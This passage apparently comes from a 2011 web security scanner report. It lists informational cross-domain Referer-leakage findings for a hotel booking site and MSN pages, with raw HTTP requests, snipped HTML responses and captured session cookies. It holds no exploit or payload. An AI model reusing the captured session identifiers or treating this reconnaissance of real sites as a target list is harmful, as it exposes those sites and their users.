<li><a href="http://www.slimcalmsexyyoga.com/fl/?keycode=143916&cm_mmc=BeFit.com-_-Get%20Fit%20Dept-_-Top%20Nav%20Rollover-_-Slim%20Calm%20Sexy%20Yoga" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title=""><img src="/sites/default/files/2015348_wowmp3_14.gif" alt="" />
...[SNIP]...
<li><a href="http://www.walkoffweightbook.com/mp3fl/?keycode=143963&cm_mmc=BeFit.com-_-Lose%20Weight%20Dept-_-Top%20Nav%20Rollover-_-Walk%20Off%20Weight%20BK%2fMP3%20Player%20Set" target="_blank" title="">Learn more!</a>
...[SNIP]...
<li class="img"><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title=""><img src="/sites/default/files/400calfix.gif" alt="" />
...[SNIP]...
<li><a href="http://www.400caloriefix.com/fl/?keycode=143989&cm_mmc=BeFit.com-_-Eat%20Right%20Dept-_-Top%20Nav%20Rollover-_-400%20Calorie%20Fix" target="_blank" title="">Learn more</a>
...[SNIP]...
<li class="img"><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title=""><img src="/sites/default/files/2015384_ridelean_2.gif" alt="" />
...[SNIP]...
<li><a href="http://www.rideyourwaylean.com/fl/?keycode=150445&cm_mmc=Fitbie.com-_-Get%20Fitter%20Dept%20-_-Top%20Nav%20Rollover-_-Ride%20Your%20Way%20Lean" target="_blank" title="">Learn more!</a>
...[SNIP]...
</span>
<a href="http://www.facebook.com/sharer.php?u=/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002" id="fbicon"><img src="/sites/all/themes/fitlife/images/fb_icon.jpg" /></a>
<iframe src="http://www.facebook.com/plugins/like.php?href=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002&layout=button_count&show_faces=false&action=like&colorscheme=light;" scrolling="no" frameborder="0" allowTransparency="true" style="border:none;overflow:hidden;height:25px;max-width:78px;">
</iframe>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/home?status=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002">Twitter</a></li>
<li class="facebook"><a href="http://www.facebook.com/sharer.php?u=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002">Facebook</a>
...[SNIP]...
<li class="digg"><a href="http://digg.com/submit?url=http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success?gt1=50002">Digg</a></li>
<li class="share">
<a class="da2a_button" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffitbie.msn.com%2Flose-weight%2Ftips%2Freasons-youre-destined-weight-loss-success&linkname=Reasons%20You%26%23039%3Bre%20Destined%20for%20Weight%20Loss%20Success%20%7C%20Fitbie" id="da2a_1"> Share</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script>
...[SNIP]...
<td>   <a target="_blank" href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635"><img src="/sites/all/themes/fitlife/images/facebook-f-icon.png" />
...[SNIP]...
<td>    <a target="_blank" href="http://twitter.com/Fitbie"><img src="/sites/all/themes/fitlife/images/twitter-t-icon.png" />
...[SNIP]...
<div class="feature-block"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><img src="http://images.rodale.com/fitlife/modules/happy-healthy-woman-laughing-th.jpg" alt="Tell Us What You Think About Fitbie!" border="0"/></a><h5>Survey</h5><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=tnWATeFb&resize=false" target="_blank"><h6>
...[SNIP]...
<li><a title="Manage Email Preferences" href="http://preferences.rodale.com/">Manage Email Preferences</a>
...[SNIP]...
<div class="social-media-links clear-block">
<a href="http://www.facebook.com/home.php?#!/pages/Fitbie/120036858057635" title="facebook" class="fb"></a>
<a href="http://twitter.com/Fitbie" title="twitter" class="tweet"></a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.83. https://gc.synxis.com/XBE/Popups/InfoPopup.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/XBE/Popups/InfoPopup.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/XBE/Popups/InfoPopup.aspx?hotel=11536&hotelgroup=5303&lang=1&view=28&shell=9adc412feca446b4bdccea9aa721a765&template=1e8778f11833464cb60925c02a37f3dd&room=ST1K&media=2666f74ea41c4e9db3ec8835549ad2a4&TB_iframe=true&width=400&height=400&modal=false

The response contains the following link to another domain:

https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg

Request

GET /XBE/Popups/InfoPopup.aspx?hotel=11536&hotelgroup=5303&lang=1&view=28&shell=9adc412feca446b4bdccea9aa721a765&template=1e8778f11833464cb60925c02a37f3dd&room=ST1K&media=2666f74ea41c4e9db3ec8835549ad2a4&TB_iframe=true&width=400&height=400&modal=false HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

17.84. https://gc.synxis.com/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/rez.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/rez.aspx?&Chain=5303&start=16&

The response contains the following link to another domain:

https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en

Request

Response

17.85. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2f01%2f2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819

The response contains the following links to other domains:

https://reztrack.com/roi/?cid=5303&hname=11536&alt=&ref=&lk=1
https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe
https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2f01%2f2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 280142
Date: Tue, 01 Feb 2011 15:33:44 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl00_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl00_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl00_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl01_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl01_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl01_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl02_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl02_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl02_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl03_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl03_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl03_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...


<img src="https://reztrack.com/roi/?cid=5303&hname=11536&alt=&ref=&lk=1" height="0" width="0" />


...[SNIP]...
</div>

<script src="https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe"></script>
...[SNIP]...

17.86. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819

The response contains the following links to other domains:

https://reztrack.com/roi/?cid=5303&hname=11536&alt=&ref=http%3a%2f%2fwww.millenniumhotels.com%2fmillenniumboston%2findex.html&lk=1
https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe
https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg

Request

GET /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Tue, 01 Feb 2011 15:26:13 GMT
Connection: keep-alive
Connection: Transfer-Encoding
Set-Cookie: ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; path=/; HttpOnly
Content-Length: 280359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl00_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl00_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl00_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl01_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl01_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl01_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl02_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl02_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl02_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...
nclick="ImageGallery_DisplayImage('V1_C2_PDR_ctl03_IG_ImageView','https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg','V1_C2_PDR_ctl03_IG_ImageViewCaptionLabel','');" href="javascript:void(0);"><img id="V1_C2_PDR_ctl03_IG_ThumbRepeater_ctl00_ThumbImage" class="GalleryThumbImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_285.jpg" style="border-width:0px;" /></a>
...[SNIP]...


<img src="https://reztrack.com/roi/?cid=5303&hname=11536&alt=&ref=http%3a%2f%2fwww.millenniumhotels.com%2fmillenniumboston%2findex.html&lk=1" height="0" width="0" />


...[SNIP]...
</div>

<script src="https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe"></script>
...[SNIP]...

17.87. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2f01%2f2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819

The response contains the following links to other domains:

https://reztrack.com/roi/?cid=5303&hname=11536&alt=&ref=https%3a%2f%2fgc.synxis.com%2fxbe%2frez.aspx%3fChain%3d5303%26start%3d1%26hotel%3d11536%26arrive%3d02%2f01%2f2011%26nights%3d1%26adult%3d1%26child%3d0%26rooms%3d1%26group%3d%26promo%3dushoyt%26iata%3d%26step%3d2%26mboxSession%3d1296573995979-796819&lk=1
https://siteseal.thawte.com/cgi/server/thawte_seal_generator.exe

Request

POST /xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2f01%2f2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819 HTTP/1.1
Host: gc.synxis.com
Connection: keep-alive
Referer: https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&hotel=11536&arrive=02%2F01%2F2011&nights=1&adult=1&child=0&rooms=1&group=&promo=ushoyt&iata=&step=2&mboxSession=1296573995979-796819
Cache-Control: max-age=0
Origin: https://gc.synxis.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574083|session#1296573995979-796819#1296575883; s_cc=true; s_sq=millenniumhotelstst%3D%2526pid%253DAvailabilityResults%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BreturnSelectProduct(11536%25252C'ST1K'%25252C'NGBDE'%25252C'152'%25252C'21.96'%25252C'173.96'%25252C'77u%25252FPD94bWwg%2526oidt%253D2%2526ot%253DBUTTON
Content-Length: 45879

__EVENTTARGET=V1%24C2&__EVENTARGUMENT=continue&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJNjE0NTMzNjU2DxYCHghYYmVTdGF0ZTLNcwABAAAA%2F%2F%2F%2F%2FwEAAAAAAAAADAIAAABaU3lueGlzLkFwcGxpY2F0aW9uLldlYi5YYmUuQnVzaW5l
...[SNIP]...

Response

17.88. https://gc.synxis.com/xbe/rez.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://gc.synxis.com
Path:	/xbe/rez.aspx

Issue detail

The page was loaded from a URL containing a query string:

https://gc.synxis.com/xbe/rez.aspx?Chain=5303&start=1&altdest=London&

The response contains the following links to other domains:

https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en
https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_690.jpg

Request

GET /xbe/rez.aspx?Chain=5303&start=1&altdest=London& HTTP/1.1
Host: gc.synxis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; ASP.NET_SessionId=jtlir345s4fdq0eiwrrnxp45; mbox=check#true#1296574114|session#1296573995979-796819#1296575914;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Tue, 01 Feb 2011 15:33:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 278255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
...[SNIP]...
<td valign="top" class="HotelImageContainer">
<img id="V1_C2_HLR_ctl01_HI" class="HotelImage" OnError="ImgError(this);" src="https://www.vfmii.com/medlib2/vfml_crs/vfml_11536_690.jpg" style="border-width:0px;" />
</td>
...[SNIP]...
</div>

<script src="https://seal.verisign.com/getseal?host_name=gc.synxis.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...

17.89. http://glo.msn.com/living/celebrity-home-collections-6350.gallery previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://glo.msn.com
Path:	/living/celebrity-home-collections-6350.gallery

Issue detail

The page was loaded from a URL containing a query string:

http://glo.msn.com/living/celebrity-home-collections-6350.gallery?gt1=49006

The response contains the following links to other domains:

http://amch.questionmarket.com/adsc/d832529/3/847182/randm.js
http://amch.questionmarket.com/adsc/d840549/12/842134/randm.js
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987
http://del.icio.us/post?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987
http://digg.com/submit?phase=2title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988
http://download.live.com/?sku=messenger
http://fashion.elle.com/blog/2010/03/how-the-stars-align-celebrity-yoga-instructor-kyle-miller.html
http://feeds.glo.com/rss/all.xml
http://go.microsoft.com/fwlink/?LinkId=74170
http://home-decor.hsn.com/happy-chic-by-jonathan-adler_c-hd_a-7652_xc.aspx?rid=1822&prev=hp
http://home-decor.hsn.com/nate-berkus_c-hd_a-5936_xc.aspx
http://homecourtbylebron.com/
http://insidemsn.wordpress.com/
http://kitchen-dining.hsn.com/easy-exotic-by-padma-lakshmi_c-qc_a-7056_xc.aspx?rid=1660&prev=hp
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportallille.112.2o7.net/b/ss/msnportallille/1/H.17--NS/0
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26973
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26974
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26975
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26976
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26977
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26978
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26979
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26980
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26981
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26982
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26983
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26985
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26986
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26987
http://reddit.com/submit?title=Celebrity+Home+Collections&url=http%3A%2F%2Fglo.msn.com%2Fliving%2Fcelebrity-home-collections-6350.gallery%3FphotoId%3D26988
http://static.glo.com/cache/css/1293231427/YWRzL2dsb1NvY2lhbC5jc3M..css
http://static.glo.com/cache/css/1293231427/aXBhZC5jc3M..css
